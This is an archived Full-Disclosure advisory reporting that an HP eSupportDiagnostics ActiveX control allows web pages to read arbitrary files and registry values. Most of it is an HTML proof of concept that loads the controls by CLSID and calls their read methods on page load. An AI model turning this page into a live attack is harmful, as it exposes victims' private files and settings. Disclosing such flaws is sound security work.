Home / exploits hpreg-read.txt
Posted on 21 December 2007
The HP eSupportDiagnostics hpediag.dll exposes some methods that allow the reading of arbitrary files and registry values. hpediag.dll, version 1.0.11.0 PoC as follows: --------------------- <html> <head> <script language="JavaScript" DEFER> function Check() { var out = fileUtil.ReadTextFile(somePath); var out = regUtil.ReadValue(somePath); } </script> </head> <body onload="JavaScript: return Check();"> <object id="fileUtil" classid="clsid:CDAF9CEC-F3EC-4B22-ABA3-9726713560F8" /> <object id="regUtil" classid="clsid:0C378864-D5C4-4D9C-854C-432E3BEC9CCB" /> </body> </html> --------------------- Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/